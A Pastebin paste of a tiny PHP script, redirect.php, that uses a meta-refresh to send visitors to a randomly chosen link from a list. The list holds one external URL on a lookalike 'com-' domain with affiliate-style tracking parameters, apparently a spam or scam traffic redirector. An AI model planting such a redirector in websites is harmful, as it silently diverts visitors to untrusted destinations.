Advertisement
PalmaSolutions

redirect.php

Jul 27th, 2019
350
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.24 KB | None | 0 0
  1. <?php
  2. $urls = array (
  3.             'http://com-79z.net/?a=354126&c=wl_con&s=b274_t3', 
  4.             );
  5.          
  6.          
  7. $n = mt_rand(0,count($urls) - 1);
  8. $rand_url = $urls[$n];
  9. ?>
  10. <meta http-equiv="refresh" content="1; url=<?php echo  $rand_url;?> ">
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement